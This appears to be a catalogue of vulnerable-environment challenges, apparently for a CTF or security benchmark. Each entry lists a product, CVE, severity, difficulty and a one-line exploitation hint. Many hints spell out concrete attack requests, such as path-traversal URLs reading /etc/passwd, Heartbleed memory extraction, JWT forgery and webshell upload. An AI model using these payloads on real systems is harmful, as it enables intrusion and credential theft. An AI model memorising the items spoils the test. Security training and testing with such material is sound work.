Craft PNG with text chunk 'profile /flag_proof'. ImageMagick embeds file contents in output image metadata during convert. Extract via identify.
Jenkins
CVE-2024-23897
jenkins/CVE-2024-23897
CVSS 9.8
HARD
PATH TRAVERSAL
π
file
Jenkins CLI @-argument file read: use @/etc/passwd pattern to read server files. Chain with credential extraction and script console for RCE.
Kibana
CVE-2018-17246
kibana/CVE-2018-17246
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
LFI in Kibana console API: /api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../ includes and executes arbitrary JS files from server.
Librsvg
CVE-2023-38633
librsvg/CVE-2023-38633
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Path traversal in librsvg when processing SVG with xlink:href containing local file path. Embed local files in rendered SVG output.
Metabase
CVE-2021-41277
metabase/CVE-2021-41277
CVSS 7.5
EASY
PATH TRAVERSAL
π
file
Path traversal in Metabase GeoJSON API endpoint. Request /api/geojson?url=file:///flag_proof to read arbitrary files without authentication.
mini_httpd
CVE-2018-18778
mini_httpd/CVE-2018-18778
CVSS 6.5
EASY
PATH TRAVERSAL
π
file
mini_httpd path traversal allows reading files outside web root. Request GET /../../../flag_proof HTTP/1.0 to retrieve the flag file directly.
n8n
CVE-2026-21858
n8n/CVE-2026-21858
CVSS 9.8
INSANE
PATH TRAVERSAL
π
file
n8n code node sandbox escape allows RCE. Exploit prototype pollution in workflow code node to break out of VM2 sandbox and execute OS commands.
Nexus Repository Manager
CVE-2024-4956
nexus/CVE-2024-4956
CVSS 7.5
EASY
PATH TRAVERSAL
π
file
Path traversal in Nexus Repository Manager allows unauthenticated file read. GET /%2F%2F%2F%2F..%2F..%2F..%2Fetc%2Fpasswd to read sensitive files including flag.
Node.js
CVE-2017-14849
node/CVE-2017-14849
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Node.js path traversal in serve-static via encoded characters. Request /../../flag_proof with encoded slashes to read files outside web root.
PHPMailer
CVE-2017-5223
phpmailer/CVE-2017-5223
CVSS 5.3
EASY
PATH TRAVERSAL
π
file
PHPMailer local file disclosure via crafted email attachment path. Send email with file:///flag_proof as attachment to read local files through mail log.
phpMyAdmin
CVE-2018-12613
phpmyadmin/CVE-2018-12613
CVSS 8.8
HARD
PATH TRAVERSAL
π
file
phpMyAdmin local file inclusion via improper whitelist check in bf_pdf_table.php. Chain with session poisoning to include PHP session file as local code.
Python
CVE-2024-23334
python/CVE-2024-23334
CVSS 7.5
EASY
PATH TRAVERSAL
π
file
aiohttp static file serving path traversal. Request GET /static/../../../flag_proof to read files outside web root in vulnerable aiohttp versions.
Ruby on Rails
CVE-2018-3760
rails/CVE-2018-3760
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Ruby on Rails path traversal in Sprockets static asset serving. Request /assets/../../../etc/passwd with encoded traversal sequences to read arbitrary files.
Ruby on Rails
CVE-2019-5418
rails/CVE-2019-5418
CVSS 7.5
MEDIUM
PATH TRAVERSAL
file
Rails file content disclosure via Content-Type header manipulation. Set Accept: ../../../flag_proof{{}} to trigger path traversal in template rendering.
Apache Solr
-
solr/Remote-Streaming-Fileread
CVSS 7.5
EASY
PATH TRAVERSAL
file
Apache Solr remote streaming file read via stream.url or stream.file parameter. Enable RemoteStreaming in solrconfig.xml then read arbitrary files via query parameter.
Apache Struts2
CVE-2023-50164
struts2/s2-066
CVSS 9.8
INSANE
PATH TRAVERSAL
file
Struts2 file upload path traversal and RCE via filename manipulation. Upload file with ../ traversal in filename combined with multipart injection to write webshell.
Apache Struts2
CVE-2024-53677
struts2/s2-067
CVSS 9.8
INSANE
PATH TRAVERSAL
file
Struts2 authentication bypass via OGNL expression in token validation. Forge action token using OGNL injection to bypass token-based CSRF protection and access protected actions.
ThinkPHP
-
thinkphp/lang-rce
CVSS 9.8
HARD
PATH TRAVERSAL
file
ThinkPHP 6.x lang parameter local file inclusion leading to RCE. Set think-lang cookie to path traversal value, upload PHP code via another endpoint, include to execute.
uWSGI
CVE-2018-7490
uwsgi/CVE-2018-7490
CVSS 7.5
MEDIUM
PATH TRAVERSAL
file
uWSGI path traversal via encoded slashes in PATH_INFO. Request /..%2F..%2F..%2Fflag_proof to traverse outside document root and read flag file.
Vite
-
vite/CNVD-2022-44615
CVSS 7.5
MEDIUM
PATH TRAVERSAL
file
Vite dev server arbitrary file read via path traversal in URL. Request /@fs/etc/passwd or /@fs/flag_proof to read files via Vite's file system exposure in dev mode.
Vite
CVE-2025-30208
vite/CVE-2025-30208
CVSS 7.5
MEDIUM
PATH TRAVERSAL
file
Vite dev server path traversal bypass via query string manipulation. Append ?import& to bypass server.fs.deny restrictions and read arbitrary files from filesystem.
Discuz!
-
discuz/x3.4-arbitrary-file-deletion
CVSS 7.5
MEDIUM
UNAUTH ACCESS
file
Authenticated file deletion in Discuz! X3.4 via crafted avatar upload path. Delete config.inc.php to reset installation and create admin account.
Django
CVE-2017-12794
django/CVE-2017-12794
CVSS 5.0
EASY
UNAUTH ACCESS
file
Django debug view XSS via crafted URL. Debug mode exposes stack traces with internal paths and settings potentially leaking SECRET_KEY.
Django
CVE-2018-14574
django/CVE-2018-14574
CVSS 6.1
EASY
UNAUTH ACCESS
file
Open redirect in Django CommonMiddleware when APPEND_SLASH=True and DEBUG=False. Redirect to attacker-controlled URL via crafted request path.
DNS
-
dns/dns-zone-transfer
CVSS 7.5
EASY
UNAUTH ACCESS
file
Misconfigured DNS server allows unauthenticated zone transfer (AXFR). Query all DNS records to discover internal hostnames and IP mappings.
Apache HTTP Server
CVE-2017-15715
httpd/CVE-2017-15715
CVSS 8.1
MEDIUM
UNAUTH ACCESS
file
Apache HTTP Server mod_rewrite newline injection. Inject \n in redirect URL to split HTTP response and inject headers/body for cache poisoning or session fixation.
Apache HTTP Server
-
httpd/apache_parsing_vulnerability
CVSS 7.5
MEDIUM
UNAUTH ACCESS
file
Apache PHP CGI parsing bug: upload file.php.jpg, Apache serves it as PHP due to mod_negotiation/mod_mime misconfiguration executing PHP code.
Jetty
CVE-2021-28164
jetty/CVE-2021-28164
CVSS 5.3
EASY
UNAUTH ACCESS
file
Jetty path traversal via encoded double-dot segments in URI. Request /%2e/WEB-INF/web.xml bypasses security constraints to read protected resources.
Jetty
CVE-2021-28169
jetty/CVE-2021-28169
CVSS 5.3
EASY
UNAUTH ACCESS
file
Jetty DefaultServlet double-decoding path traversal. Request /%2F/ sequences expose file contents from outside the servlet context root.
Jetty
CVE-2021-34429
jetty/CVE-2021-34429
CVSS 5.3
MEDIUM
UNAUTH ACCESS
file
Jetty URI encoding bypass to access WEB-INF directory. Use %u0000 or %2F sequences to bypass security constraints and read protected files.
MinIO
CVE-2023-28432
minio/CVE-2023-28432
CVSS 7.5
MEDIUM
UNAUTH ACCESS
env
MinIO information disclosure exposes environment variables including credentials via POST /minio/health/cluster?verify. Extract MINIO_SECRET_KEY as flag.
Nginx
CVE-2013-4547
nginx/CVE-2013-4547
CVSS 7.5
MEDIUM
UNAUTH ACCESS
file
Nginx path traversal via null byte in URI before static file extension. Request /uploads/evil.php%00.png to execute PHP code uploaded as image file.
Nginx
CVE-2017-7529
nginx/CVE-2017-7529
CVSS 5.3
EASY
UNAUTH ACCESS
file
Nginx integer overflow in range filter allows memory disclosure. Send Range: bytes=-17208 header to retrieve memory contents from previous request including sensitive data.
Nginx
-
nginx/insecure-configuration
CVSS 7.5
MEDIUM
UNAUTH ACCESS
file
Nginx misconfiguration allows path traversal via alias directive without trailing slash. Access /static../etc/passwd by exploiting alias stripping behavior.
Nginx
-
nginx/nginx_parsing_vulnerability
CVSS 7.5
MEDIUM
UNAUTH ACCESS
file
Nginx+PHP-FPM path confusion vulnerability. Upload image.jpg containing PHP code, access as /image.jpg/nonexistent.php to trigger PHP-FPM execution.
Nginx UI
CVE-2026-27944
nginx-ui/CVE-2026-27944
CVSS 9.8
HARD
UNAUTH ACCESS
file
Nginx-UI authentication bypass via JWT algorithm confusion. Forge admin JWT token using none algorithm to access configuration API and execute nginx config injection.
OpenSSH
CVE-2018-15473
openssh/CVE-2018-15473
CVSS 5.3
EASY
UNAUTH ACCESS
env
OpenSSH user enumeration via timing difference in authentication responses. Use timing oracle to enumerate valid usernames, then brute-force credentials to login and read flag.
OpenSSL
CVE-2014-0160
openssl/CVE-2014-0160
CVSS 7.5
MEDIUM
UNAUTH ACCESS
env
Heartbleed: OpenSSL/TLS heartbeat extension buffer over-read leaks server memory. Send crafted heartbeat request to extract memory containing private keys and session tokens.
OpenSSL
CVE-2022-0778
openssl/CVE-2022-0778
CVSS 7.5
MEDIUM
UNAUTH ACCESS
file
OpenSSL infinite loop in BN_mod_sqrt() via crafted certificate. Trigger DoS with malformed EC certificate, then exploit accompanying service vulnerability to read flag.
ownCloud
CVE-2023-49103
owncloud/CVE-2023-49103
CVSS 7.5
EASY
UNAUTH ACCESS
env
ownCloud GraphAPI app discloses phpinfo() including environment variables. Access /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php to extract FLAG env var.
Polkit Pkexec
CVE-2021-4034
polkit/CVE-2021-4034
CVSS 7.8
MEDIUM
UNAUTH ACCESS
file
Polkit pkexec local privilege escalation via argument array manipulation. Compile and run PwnKit exploit on the system to escalate to root and read /flag_proof.
PostgreSQL
CVE-2018-1058
postgres/CVE-2018-1058
CVSS 8.8
HARD
UNAUTH ACCESS
file
PostgreSQL search_path injection allows privilege escalation. Create malicious function in public schema that gets executed with elevated privileges when superuser runs query.
SaltStack
CVE-2020-11651
saltstack/CVE-2020-11651
CVSS 9.8
EASY
UNAUTH ACCESS
file
SaltStack authentication bypass in salt-master ClearFuncs. Call _send_pub() and _auth_info() methods without authentication to bypass access controls and execute commands on minions.
V2board
-
v2board/1.6-privilege-escalation
CVSS 8.8
HARD
UNAUTH ACCESS
file
V2Board privilege escalation via JWT secret disclosure in config. Extract JWT secret from database, forge admin token, and access privileged API endpoints.